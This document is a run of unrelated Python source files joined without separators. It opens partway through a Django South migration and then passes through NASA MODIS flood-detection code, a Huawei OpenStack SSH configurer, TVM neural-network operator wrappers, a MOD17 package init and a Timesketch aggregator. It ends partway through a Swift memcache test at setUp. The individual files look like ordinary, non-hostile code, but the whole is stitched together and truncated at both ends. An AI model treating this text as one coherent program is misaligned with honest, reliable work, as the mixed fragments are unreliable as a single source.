            'runs_on_bank_holidays': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_friday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_monday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_non_bank_holidays': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_saturday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_sunday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_thursday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_tuesday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_on_wednesday': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'runs_until': ('django.db.models.fields.DateField', [], {}),
            'vehicle': ('django.db.models.fields.TextField', [], {})
        },
        'places.route': {
            'Meta': {'object_name': 'Route'},
            'external_ref': ('django.db.models.fields.TextField', [], {}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'operator': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'service_id': ('django.db.models.fields.TextField', [], {}),
            'service_name': ('django.db.models.fields.TextField', [], {'null': 'True'}),
            'stops': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['places.Entity']", 'through': "orm['places.StopOnRoute']", 'symmetrical': 'False'})
        },
        'places.scheduledstop': {
            'Meta': {'ordering': "['order']", 'object_name': 'ScheduledStop'},
            'activity': ('django.db.models.fields.CharField', [], {'default': "'B'", 'max_length': '1'}),
            'entity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Entity']"}),
            'fare_stage': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'journey': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Journey']"}),
            'order': ('django.db.models.fields.IntegerField', [], {}),
            'sta': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
            'std': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
            'times_estimated': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
        },
        'places.source': {
            'Meta': {'object_name': 'Source'},
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'module_name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
        },
        'places.stoponroute': {
            'Meta': {'ordering': "['order']", 'object_name': 'StopOnRoute'},
            'entity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Entity']"}),
            'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'order': ('django.db.models.fields.IntegerField', [], {}),
            'route': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['places.Route']"})
        }
    }

    complete_apps = ['places']

# -----------------------------------------------------------------------------
# Copyright * 2014, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration. All
# rights reserved.
#
# The Crisis Mapping Toolkit (CMT) v1 platform is licensed under the Apache
# License, Version 2.0 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# -----------------------------------------------------------------------------

import ee
import math

from cmt.mapclient_qt import addToMap
from cmt.util.miscUtilities import safe_get_info
import modis_utilities

'''
Contains implementations of several simple MODIS-based flood detection algorithms.
'''

#==============================================================


def dem_threshold(domain, b):
    '''Classify as water every pixel whose DEM height is below a fixed
    threshold taken from the domain's algorithm parameters.'''

    cutoff = float(domain.algorithm_params['dem_threshold'])
    return domain.get_dem().image.lt(cutoff).select(['elevation'], ['b1'])


#==============================================================

def evi(domain, b):
    '''Simple EVI based classifier'''
    # Water if EVI is low and LSWI sufficiently exceeds EVI...
    low_evi_wet = b['EVI'].lte(0.3).And(
        b['LSWI'].subtract(b['EVI']).gte(0.05)).select(['sur_refl_b02'], ['b1'])
    # ...or if both EVI and LSWI are very low.
    very_low = b['EVI'].lte(0.05).And(
        b['LSWI'].lte(0.0)).select(['sur_refl_b02'], ['b1'])
    return low_evi_wet.Or(very_low)

def xiao(domain, b):
    '''Method from paper: Xiao, Boles, Frolking, et. al. Mapping paddy rice agriculture in South and Southeast Asia using
                          multi-temporal MODIS images, Remote Sensing of Environment, 2006.

        This method implements a very simple decision tree from several standard MODIS data products.
        The default constants were tuned for (wet) rice paddy detection.
    '''
    lswi = b['LSWI']
    flooded = lswi.subtract(b['NDVI']).gte(0.05)
    flooded = flooded.Or(lswi.subtract(b['EVI']).gte(0.05))
    return flooded.select(['sur_refl_b02'], ['b1'])


#==============================================================

def get_diff(b):
    '''Core of the difference index: band 2 minus band 1.'''
    difference = b['b2'].subtract(b['b1'])
    return difference.select(['sur_refl_b02'], ['b1'])

def diff_learned(domain, b):
    '''modis_diff but with the threshold calculation included (training image required)

    Returns None when no unflooded training domain is available.
    '''
    # FIX: identity test with `is None` instead of `== None`, which relied
    # on the domain object's __eq__.
    if domain.unflooded_domain is None:
        print('No unflooded training domain provided.')
        return None
    unflooded_b = modis_utilities.compute_modis_indices(domain.unflooded_domain)
    water_mask  = modis_utilities.get_permanent_water_mask()

    # Learn the threshold from the unflooded image, then apply it.
    threshold = modis_utilities.compute_binary_threshold(get_diff(unflooded_b), water_mask, domain.bounds)
    return modis_diff(domain, b, threshold)

def modis_diff(domain, b, threshold=None):
    '''Compute (b2-b1) < threshold, a simple water detection index.

       This method may be all that is needed in cases where the threshold can be hand tuned.
    '''
    # FIX: `is None` instead of `== None` for the sentinel check.
    if threshold is None: # If no threshold value passed in, load it based on the data set.
        threshold = float(domain.algorithm_params['modis_diff_threshold'])
    return get_diff(b).lte(threshold)

#==============================================================

def get_dartmouth(b, num_offset=500, den_offset=2500):
    '''Core of the Dartmouth index: (b2 + num_offset) / (b1 + den_offset).

    The offsets default to the original hand-tuned constants (500, 2500);
    they are exposed as parameters so callers can re-tune without editing
    this function.
    '''
    return b['b2'].add(num_offset).divide(b['b1'].add(den_offset)).select(['sur_refl_b02'], ['b1'])

def dart_learned(domain, b):
    '''The dartmouth method but with threshold calculation included (training image required)

    Returns None when no unflooded training domain is available.
    '''
    # FIX: identity test with `is None` instead of `== None`.
    if domain.unflooded_domain is None:
        print('No unflooded training domain provided.')
        return None
    unflooded_b = modis_utilities.compute_modis_indices(domain.unflooded_domain)
    water_mask  = modis_utilities.get_permanent_water_mask()
    threshold   = modis_utilities.compute_binary_threshold(get_dartmouth(unflooded_b), water_mask, domain.bounds)
    return dartmouth(domain, b, threshold)

def dartmouth(domain, b, threshold=None):
    '''A flood detection method from the Dartmouth Flood Observatory.

        This method is a refinement of the simple b2-b1 detection method.
    '''
    # FIX: `is None` instead of `== None` for the sentinel check.
    if threshold is None:
        threshold = float(domain.algorithm_params['dartmouth_threshold'])
    return get_dartmouth(b).lte(threshold)

#==============================================================

def get_mod_ndwi(b):
    '''Normalized-difference style index over MODIS bands 6 and 4:
    (b6 - b4) / (b4 + b6).'''
    numerator   = b['b6'].subtract(b['b4'])
    denominator = b['b4'].add(b['b6'])
    return numerator.divide(denominator).select(['sur_refl_b06'], ['b1'])

def mod_ndwi_learned(domain, b):
    '''mod_ndwi with the threshold learned from an unflooded training image.

    Returns None when no unflooded training domain is available.
    '''
    # FIX: identity test with `is None` instead of `== None`.
    if domain.unflooded_domain is None:
        print('No unflooded training domain provided.')
        return None
    unflooded_b = modis_utilities.compute_modis_indices(domain.unflooded_domain)
    water_mask  = modis_utilities.get_permanent_water_mask()
    threshold   = modis_utilities.compute_binary_threshold(get_mod_ndwi(unflooded_b), water_mask, domain.bounds)
    return mod_ndwi(domain, b, threshold)

def mod_ndwi(domain, b, threshold=None):
    '''Threshold the MODIS NDWI index; loads the threshold from the
    domain's algorithm parameters when not supplied.'''
    # FIX: `is None` instead of `== None` for the sentinel check.
    if threshold is None:
        threshold = float(domain.algorithm_params['mod_ndwi_threshold'])
    return get_mod_ndwi(b).lte(threshold)

#==============================================================

def get_fai(b):
    '''Just the internals of the FAI method'''
    # Interpolation weight between the band-1 (645nm) and band-5 (1240nm)
    # wavelengths, evaluated at band-2's 859nm center.
    weight   = (859.0 - 645) / (1240 - 645)
    baseline = b['b1'].add(b['b5'].subtract(b['b1']).multiply(weight))
    return b['b2'].subtract(baseline).select(['sur_refl_b02'], ['b1'])

def fai_learned(domain, b):
    '''fai with the threshold learned from an unflooded training image.

    Returns None when no unflooded training domain is available.
    '''
    # FIX: identity test with `is None` instead of `== None`.
    if domain.unflooded_domain is None:
        print('No unflooded training domain provided.')
        return None
    unflooded_b = modis_utilities.compute_modis_indices(domain.unflooded_domain)
    water_mask  = modis_utilities.get_permanent_water_mask()

    threshold = modis_utilities.compute_binary_threshold(get_fai(unflooded_b), water_mask, domain.bounds)
    return fai(domain, b, threshold)

def fai(domain, b, threshold=None):
    ''' Floating Algae Index. Method from paper: Feng, Hu, Chen, Cai, Tian, Gan,
    Assessment of inundation changes of Poyang Lake using MODIS observations
    between 2000 and 2010. Remote Sensing of Environment, 2012.
    '''
    # FIX: `is None` instead of `== None` for the sentinel check.
    if threshold is None:
        threshold = float(domain.algorithm_params['fai_threshold'])
    return get_fai(b).lte(threshold)

# -*- coding:utf-8 -*-
__author__ = 'q00222219@huawei'

import time
from heat.openstack.common import log as logging

import heat.engine.resources.cloudmanager.commonutils as commonutils
import heat.engine.resources.cloudmanager.constant as constant
import heat.engine.resources.cloudmanager.exception as exception
import pdb

LOG = logging.getLogger(__name__)


class CascadedConfiger(object):
    """Configures a cascaded OpenStack node over SSH.

    Waits for the cascaded host to become reachable, pushes DNS
    configuration via remote scripts, then verifies the API responds,
    retrying the configuration when the check fails.
    """
    def __init__(self, public_ip_api, api_ip, domain, user, password,
                 cascading_domain, cascading_api_ip, cascaded_domain,
                 cascaded_api_ip, cascaded_api_subnet_gateway):
        # Public address used for all SSH operations against the cascaded host.
        self.public_ip_api = public_ip_api
        # Internal API address of the cascaded host (used only for logging here).
        self.api_ip = api_ip
        self.domain = domain
        self.user = user
        self.password = password
        self.cascading_domain = cascading_domain
        self.cascading_api_ip = cascading_api_ip
        self.cascaded_domain = cascaded_domain
        self.cascaded_ip = cascaded_api_ip
        self.gateway = cascaded_api_subnet_gateway

    def do_config(self):
        """Run the full configuration sequence against the cascaded host."""
        start_time = time.time()
        #pdb.set_trace()
        LOG.info("start config cascaded, cascaded: %s" % self.domain)
        # wait cascaded tunnel can visit
        commonutils.check_host_status(host=self.public_ip_api,
                                      user=self.user,
                                      password=self.password,
                                      retry_time=500, interval=1)

        # config cascaded host
        self._config_az_cascaded()

        cost_time = time.time() - start_time
        LOG.info("first config success,  cascaded: %s, cost time: %d"
                    % (self.domain, cost_time))

        # check config result
        for i in range(3):
            try:
                # check 90s
                commonutils.check_host_status(
                    host=self.public_ip_api,
                    user=constant.VcloudConstant.ROOT,
                    password=constant.VcloudConstant.ROOT_PWD,
                    retry_time=15,
                    interval=1)
                LOG.info("cascaded api is ready..")
                break
            except exception.CheckHostStatusFailure:
                if i == 2:
                    # NOTE(review): after the third failed check we only log
                    # and fall through — the final "success" log below is
                    # still emitted; confirm this best-effort behavior is
                    # intended.
                    LOG.error("check cascaded api failed ...")
                    break
                LOG.error("check cascaded api error, "
                             "retry config cascaded ...")
                self._config_az_cascaded()

        cost_time = time.time() - start_time
        LOG.info("config cascaded success, cascaded: %s, cost_time: %d"
                    % (self.domain, cost_time))

    def _config_az_cascaded(self):
        """Push DNS server mappings to the cascaded host via a remote script.

        Retries the SSH command up to 30 times (1s apart); always returns
        True.
        """
        LOG.info("start config cascaded host, host: %s" % self.api_ip)
        # modify dns server address
        # dnsmasq-style mapping: /<domain>/<ip> entries for both the
        # cascading and cascaded domains.
        address = "/%(cascading_domain)s/%(cascading_ip)s,/%(cascaded_domain)s/%(cascaded_ip)s" \
                  % {"cascading_domain": self.cascading_domain,
                     "cascading_ip": self.cascading_api_ip,
                     "cascaded_domain":self.cascaded_domain,
                     "cascaded_ip":self.cascaded_ip}
        for i in range(30):
            try:
                commonutils.execute_cmd_without_stdout(
                    host=self.public_ip_api,
                    user=self.user,
                    password=self.password,
                    cmd='cd %(dir)s; source /root/adminrc; sh %(script)s replace %(address)s'
                        % {"dir": constant.PublicConstant.SCRIPTS_DIR,
                           "script": constant.PublicConstant.
                               MODIFY_DNS_SERVER_ADDRESS,
                           "address": address})
                break
            except exception.SSHCommandFailure as e:
                LOG.error("modify cascaded dns address error, cascaded: "
                             "%s, error: %s"
                             % (self.domain, e.format_message()))
                time.sleep(1)

        # NOTE(review): reached even when all 30 attempts failed — the
        # success log and True return do not reflect actual command status;
        # confirm this is intended.
        LOG.info(
            "config cascaded dns address success, cascaded: %s"
            % self.public_ip_api)

        return True



"""Neural network operations."""
from __future__ import absolute_import as _abs
from . import _make


def conv2d(data,
           weight,
           strides=(1, 1),
           padding=(0, 0),
           dilation=(1, 1),
           groups=1,
           channels=None,
           kernel_size=None,
           data_layout="NCHW",
           weight_layout="OIHW",
           out_layout="",
           out_dtype=""):
    r"""2D convolution.

    This operator takes the weight as the convolution kernel
    and convolves it with data to produce an output.


    In the default case, where the data_layout is `NCHW`
    and weight_layout is `OIHW`, conv2d takes in
    a data Tensor with shape `(batch_size, in_channels, height, width)`,
    and a weight Tensor with shape `(channels, in_channels, kernel_size[0], kernel_size[1])`
    to produce an output Tensor with the following rule:

    .. math::

        \mbox{out}[b, c, y, x] = \sum_{dy, dx, k}
           \mbox{data}[b, k, \mbox{strides}[0] * y  + dy, \mbox{strides}[1] * x + dx] *
           \mbox{weight}[c, k, dy, dx]

    Padding and dilation are applied to data and weight respectively before the computation.
    This operator accepts data layout specification.
    Semantically, the operator will convert the layout to the canonical layout
    (`NCHW` for data and `OIHW` for weight), perform the computation,
    then convert to the out_layout.


    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    weight : relay.Expr
        The weight expressions.

    strides : tuple of int, optional
        The strides of convolution.

    padding : tuple of int, optional
        The padding of convolution on both sides of inputs before convolution.

    dilation : tuple of int, optional
        Specifies the dilation rate to be used for dilated convolution.

    groups : int, optional
        Number of groups for grouped convolution.

    channels : int, optional
        Number of output channels of this convolution.

    kernel_size : tuple of int, optional
        The spatial dimensions of the convolution kernel.

    data_layout : str, optional
        Layout of the input.

    weight_layout : str, optional
        Layout of the weight.

    out_layout : str, optional
        Layout of the output, by default, out_layout is the same as data_layout

    out_dtype : str, optional
        Specifies the output data type for mixed precision conv2d.

    Returns
    -------
    result : relay.Expr
        The computed result.
    """
    return _make.conv2d(data, weight, strides, padding, dilation,
                        groups, channels, kernel_size, data_layout,
                        weight_layout, out_layout, out_dtype)


def softmax(data, axis):
    r"""Computes softmax.

    .. math:: \text{softmax}(x)_i = \frac{exp(x_i)}{\sum_j exp(x_j)}

    .. note::
        This operator can be optimized away for inference.

    Parameters
    ----------
    data: relay.Expr
        The input data to the operator.

    axis: int
        The axis to sum over when computing softmax

    Returns
    -------
    result : relay.Expr
        The computed result.
    """

    return _make.softmax(data, axis)


def log_softmax(data, axis):
    r"""Computes log softmax.

    .. math::

        \text{log_softmax}(x)_i = \log \frac{exp(x_i)}{\sum_j exp(x_j)}

    .. note::
        This operator can be optimized away for inference.

    Parameters
    ----------
    data: relay.Expr
        The input data to the operator.

    axis: int
        The axis to sum over when computing softmax

    Returns
    -------
    result : relay.Expr
        The computed result.
    """

    return _make.log_softmax(data, axis)


def max_pool2d(data,
               pool_size=(1, 1),
               strides=(1, 1),
               padding=(0, 0),
               layout="NCHW",
               ceil_mode=False):
    r"""2D maximum pooling operator.

    This operator takes data as input and does 2D max value calculation
    with in pool_size sized window by striding defined by stride


    In the default case, where the data_layout is `NCHW`
    a data Tensor with shape `(batch_size, in_channels, height, width)`,
    to produce an output Tensor with the following rule:

    with data of shape (b, c, h, w) and pool_size (kh, kw)

    .. math::

        \mbox{out}(b, c, y, x)  = \max_{m=0, \ldots, kh-1} \max_{n=0, \ldots, kw-1}
             \mbox{data}(b, c, \mbox{stride}[0] * y + m, \mbox{stride}[1] * x + n)

    Padding is applied to data before the computation.
    ceil_mode is used to take ceil or floor while computing out shape.
    This operator accepts data layout specification.

    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    pool_size : tuple of int, optional
        The size of the pooling window.

    strides : tuple of int, optional
        The strides of pooling.

    padding : tuple of int, optional
        The padding for pooling.

    layout : str, optional
        Layout of the input.

    ceil_mode : bool, optional
        To enable or disable ceil while pooling.

    Returns
    -------
    result : relay.Expr
        The computed result.
    """
    return _make.max_pool2d(data, pool_size, strides, padding,
                            layout, ceil_mode)

def avg_pool2d(data,
               pool_size=(1, 1),
               strides=(1, 1),
               padding=(0, 0),
               layout="NCHW",
               ceil_mode=False,
               count_include_pad=False):
    r"""2D average pooling operator.

    This operator takes data as input and does 2D average value calculation
    with in pool_size sized window by striding defined by stride


    In the default case, where the data_layout is `NCHW`
    a data Tensor with shape `(batch_size, in_channels, height, width)`,
    to produce an output Tensor with the following rule:

    with data of shape (b, c, h, w), pool_size (kh, kw)

    .. math::

        \mbox{out}(b, c, y, x)  = \frac{1}{kh * kw} \sum_{m=0}^{kh-1} \sum_{n=0}^{kw-1}
             \mbox{data}(b, c, \mbox{stride}[0] * y + m, \mbox{stride}[1] * x + n)

    Padding is applied to data before the computation.
    ceil_mode is used to take ceil or floor while computing out shape.
    count_include_pad indicates including or excluding padded input values in computation.
    This operator accepts data layout specification.

    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    pool_size : tuple of int, optional
        The size of the pooling window.

    strides : tuple of int, optional
        The strides of pooling.

    padding : tuple of int, optional
        The padding for pooling.

    layout : str, optional
        Layout of the input.

    ceil_mode : bool, optional
        To enable or disable ceil while pooling.

    count_include_pad : bool, optional
        To include padding to compute the average.

    Returns
    -------
    result : relay.Expr
        The computed result.
    """
    return _make.avg_pool2d(data, pool_size, strides, padding,
                            layout, ceil_mode, count_include_pad)

def global_max_pool2d(data,
                      layout="NCHW"):
    r"""2D global maximum pooling operator.

    This operator takes data as input and does 2D max value calculation
    across each window represented by WxH. The output spatial dimensions
    are therefore 1x1.


    In the default case, where the data_layout is `NCHW`
    a data Tensor with shape `(batch_size, in_channels, height, width)`,
    to produce an output Tensor with the following rule:

    with data of shape (b, c, h, w)

    .. math::

        \mbox{out}(b, c, 1, 1)  = \max_{m=0, \ldots, h} \max_{n=0, \ldots, w}
             \mbox{data}(b, c, m, n)

    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    layout : str, optional
        Layout of the input.

    Returns
    -------
    result : relay.Expr
        The computed result.
    """
    return _make.global_max_pool2d(data, layout)

def global_avg_pool2d(data,
                      layout="NCHW"):
    r"""2D global average pooling operator.

    This operator takes data as input and does 2D average value calculation
    across each window represented by WxH. The output spatial dimensions
    are therefore 1x1.


    In the default case, where the data_layout is `NCHW`
    a data Tensor with shape `(batch_size, in_channels, height, width)`,
    to produce an output Tensor with the following rule:

    with data of shape (b, c, h, w)

    .. math::

        \mbox{out}(b, c, 1, 1)  = \frac{1}{h * w} \sum_{m=0}^{h-1} \sum_{n=0}^{w-1}
             \mbox{data}(b, c, m, n)

    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    layout : str, optional
        Layout of the input.

    Returns
    -------
    result : relay.Expr
        The computed result.
    """
    return _make.global_avg_pool2d(data, layout)


def upsampling(data,
               scale=1,
               layout="NCHW",
               method="NEAREST_NEIGHBOR"):
    """Upsampling.

    This operator takes data as input and does 2D scaling to the given scale factor.
    In the default case, where the data_layout is `NCHW`
    with data of shape (n, c, h, w)
    out will have a shape (n, c, h*scale, w*scale)

    method indicates the algorithm to be used while calculating the output value
    and method can be one of ("BILINEAR", "NEAREST_NEIGHBOR")

    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    scale : int, optional
        The scale factor for upsampling.

    layout : str, optional
        Layout of the input.

    method : str, optional
        Scale method to used [NEAREST_NEIGHBOR, BILINEAR].

    Returns
    -------
    result : relay.Expr
        The computed result.
    """
    return _make.upsampling(data, scale, layout, method)

def batch_flatten(data):
    """BatchFlatten.

    This operator flattens all the dimensions except for the batch dimension,
    which results in a 2D output.

    For data with shape ``(d1, d2, ..., dk)``
    batch_flatten(data) returns reshaped output of shape ``(d1, d2*...*dk)``.


    Parameters
    ----------
    data : relay.Expr
        The input data to the operator.

    Returns
    -------
    result: relay.Expr
        The flattened result.
    """
    return _make.batch_flatten(data)

# -*- coding: utf-8 -*-
"""
Authors: Tim Hessels
         UNESCO-IHE 2016
Contact: t.hessels@unesco-ihe.org
Repository: https://github.com/wateraccounting/wa
Module: Collect/MOD17

Description:
This module downloads MOD17 GPP data from
http://e4ftl01.cr.usgs.gov/. Use the MOD17.GPP_8daily function to
download and create 8 daily GPP images in Gtiff format.
The data is available from 2000-02-18 until the present.

Examples:
from wa.Collect import MOD17
MOD17.GPP_8daily(Dir='C:/Temp3/', Startdate='2003-12-01', Enddate='2003-12-20',
           latlim=[41, 45], lonlim=[-8, -5])
MOD17.NPP_yearly(Dir='C:/Temp3/', Startdate='2003-12-01', Enddate='2003-12-20',
           latlim=[41, 45], lonlim=[-8, -5])		   
"""

from .GPP_8daily import main as GPP_8daily
from .NPP_yearly import main as NPP_yearly

# Public API of the MOD17 collection module.
__all__ = ['GPP_8daily', 'NPP_yearly']

# Module version.
__version__ = '0.1'

# Copyright 2019 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Term aggregations."""

from __future__ import unicode_literals

from timesketch.lib.aggregators import manager
from timesketch.lib.aggregators import interface


def get_spec(field, limit=10, query='', query_dsl=''):
    """Build an aggregation spec for a term of filtered events.

    The resulting spec summarizes the values of an attribute across all
    events that match the supplied filter.

    Args:
        field (str): this denotes the event attribute that is used
            for aggregation.
        limit (int): How many buckets to return, defaults to 10.
        query (str): the query field to run on all documents prior to
            aggregating the results.
        query_dsl (str): the query DSL field to run on all documents prior
            to aggregating the results (optional). Either a query string
            or a query DSL has to be present.

    Raises:
        ValueError: if neither query_string or query_dsl is provided.

    Returns:
        a dict value that can be used as an aggregation spec.
    """
    # Fail fast if no filter of either kind was supplied.
    if not (query or query_dsl):
        raise ValueError('Neither query nor query DSL provided.')

    if query:
        # Wrap the plain query string in a boolean must clause.
        query_filter = {
            'bool': {'must': [{'query_string': {'query': query}}]}
        }
    else:
        # A DSL filter is passed through as-is.
        query_filter = query_dsl

    return {
        'query': query_filter,
        'aggs': {
            'aggregation': {'terms': {'field': field, 'size': limit}}
        },
    }


class FilteredTermsAggregation(interface.BaseAggregator):
    """Query Filter Term Aggregation."""

    NAME = 'query_bucket'
    DISPLAY_NAME = 'Filtered Terms Aggregation'
    DESCRIPTION = 'Aggregating values of a field after applying a filter'

    SUPPORTED_CHARTS = frozenset(
        ['barchart', 'circlechart', 'hbarchart', 'linechart', 'table'])

    FORM_FIELDS = [
        {
            'type': 'ts-dynamic-form-select-input',
            'name': 'supported_charts',
            'label': 'Chart type to render',
            'options': list(SUPPORTED_CHARTS),
            'display': True
        },
        {
            'name': 'query_string',
            'type': 'ts-dynamic-form-text-input',
            'label': 'The filter query to narrow down the result set',
            'placeholder': 'Query',
            'default_value': '',
            'display': True
        },
        {
            'name': 'query_dsl',
            'type': 'ts-dynamic-form-text-input',
            'label': 'The filter query DSL to narrow down the result',
            'placeholder': 'Query DSL',
            'default_value': '',
            'display': False
        },
        {
            'name': 'field',
            'type': 'ts-dynamic-form-text-input',
            'label': 'What field to aggregate.',
            'display': True
        },
        {
            'type': 'ts-dynamic-form-datetime-input',
            'name': 'start_time',
            'label': (
                'ISO formatted timestamp for the start time '
                'of the aggregated data'),
            'placeholder': 'Enter a start date for the aggregation',
            'default_value': '',
            'display': True
        },
        {
            'type': 'ts-dynamic-form-datetime-input',
            'name': 'end_time',
            'label': 'ISO formatted end time for the aggregation',
            'placeholder': 'Enter an end date for the aggregation',
            'default_value': '',
            'display': True
        },
        {
            'type': 'ts-dynamic-form-text-input',
            'name': 'limit',
            'label': 'Number of results to return',
            'placeholder': 'Enter number of results to return',
            'default_value': '10',
            'display': True
        }
    ]

    @property
    def chart_title(self):
        """Returns a title for the chart."""
        if not self.field:
            return 'Top results for an unknown field after filtering'
        return 'Top filtered results for "{0:s}"'.format(self.field)

    # pylint: disable=arguments-differ
    def run(
            self, field, query_string='', query_dsl='',
            supported_charts='table', start_time='', end_time='', limit=10):
        """Run the aggregation.

        Args:
            field (str): this denotes the event attribute that is used
                for aggregation.
            query_string (str): the query field to run on all documents prior to
                aggregating the results.
            query_dsl (str): the query DSL field to run on all documents prior
                to aggregating the results. Either a query string or a query
                DSL has to be present.
            supported_charts: Chart type to render. Defaults to table.
            start_time: Optional ISO formatted date string that limits the time
                range for the aggregation.
            end_time: Optional ISO formatted date string that limits the time
                range for the aggregation.
            limit (int): How many buckets to return, defaults to 10.

        Returns:
            Instance of interface.AggregationResult with aggregation result.

        Raises:
            ValueError: if neither query_string or query_dsl is provided.
        """
        if not query_string and not query_dsl:
            raise ValueError('Both query_string and query_dsl are missing')

        # Remember the field so chart_title can use it later.
        self.field = field
        field_name = self.format_field_by_type(field)

        spec = get_spec(
            field=field_name, limit=limit, query=query_string,
            query_dsl=query_dsl)
        spec = self._add_query_to_aggregation_spec(
            spec, start_time=start_time, end_time=end_time)

        # Encoding information for Vega-Lite: one mark per term value,
        # sorted by descending total count.
        sort_spec = {'op': 'sum', 'field': 'count', 'order': 'descending'}
        encoding = {
            'x': {'field': field, 'type': 'nominal', 'sort': sort_spec},
            'y': {'field': 'count', 'type': 'quantitative'},
            'tooltip': [
                {'field': field, 'type': 'nominal'},
                {'field': 'count', 'type': 'quantitative'}],
        }

        response = self.opensearch_aggregation(spec)
        buckets = response.get(
            'aggregations', {}).get('aggregation', {}).get('buckets', [])
        values = [
            {field: bucket.get('key', 'N/A'),
             'count': bucket.get('doc_count', 0)}
            for bucket in buckets
        ]

        extra_query_url = (
            'AND {0:s}'.format(query_string) if query_string else '')

        return interface.AggregationResult(
            encoding=encoding, values=values, chart_type=supported_charts,
            sketch_url=self._sketch_url, field=field,
            extra_query_url=extra_query_url)


manager.AggregatorManager.register_aggregator(FilteredTermsAggregation)

# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import os
from textwrap import dedent
import unittest

from eventlet.green import ssl
import mock
from six.moves.configparser import NoSectionError, NoOptionError

from swift.common.middleware import memcache
from swift.common.memcached import MemcacheRing
from swift.common.swob import Request
from swift.common.wsgi import loadapp

from test.unit import with_tempdir, patch_policies


class FakeApp(object):
    """Minimal WSGI app that returns its environ so tests can inspect it."""

    def __call__(self, env, start_response):
        return env


class ExcConfigParser(object):
    """Config parser double whose read() always raises.

    Lets tests assert that a code path never attempts to read a config
    file from disk.
    """

    def read(self, path):
        # The exact message (including the repr quotes) is asserted on
        # by the tests below.
        message = 'read called with %r' % path
        raise Exception(message)


class EmptyConfigParser(object):
    """Config parser double that behaves as though no file exists."""

    def read(self, path):
        # Report "nothing read" regardless of the requested path.
        return False


def get_config_parser(memcache_servers='1.2.3.4:5',
                      memcache_serialization_support='1',
                      memcache_max_connections='4',
                      section='memcache'):
    """Build a ConfigParser replacement class with canned option values.

    Any of the option arguments may be set to the string 'error' to make
    the produced parser raise NoOptionError when that option is requested.

    :param memcache_servers: canned value for the memcache_servers option
    :param memcache_serialization_support: canned value for the
        memcache_serialization_support option
    :param memcache_max_connections: canned value for the
        memcache_max_connections / max_connections options
    :param section: the only section the parser claims to contain
    :returns: the SetConfigParser class (not an instance)
    """
    _srvs = memcache_servers
    _sers = memcache_serialization_support
    _maxc = memcache_max_connections
    _section = section

    class SetConfigParser(object):

        def items(self, section_name):
            # Consistently use the captured values rather than mixing
            # closure parameters and the saved locals.
            if section_name != _section:
                raise NoSectionError(section_name)
            return {
                'memcache_servers': _srvs,
                'memcache_serialization_support': _sers,
                'memcache_max_connections': _maxc,
            }

        def read(self, path):
            # Pretend the file at ``path`` was read successfully.
            return True

        def get(self, section, option):
            if _section != section:
                # Bug fix: previously raised NoSectionError(option),
                # reporting the option name as the missing section.
                raise NoSectionError(section)
            if option == 'memcache_servers':
                if _srvs == 'error':
                    raise NoOptionError(option, section)
                return _srvs
            elif option == 'memcache_serialization_support':
                if _sers == 'error':
                    raise NoOptionError(option, section)
                return _sers
            elif option in ('memcache_max_connections',
                            'max_connections'):
                if _maxc == 'error':
                    raise NoOptionError(option, section)
                return _maxc
            else:
                raise NoOptionError(option, section)

    return SetConfigParser


def start_response(*args):
    """No-op WSGI start_response stand-in for driving the middleware."""
    pass


class TestCacheMiddleware(unittest.TestCase):

    def setUp(self):
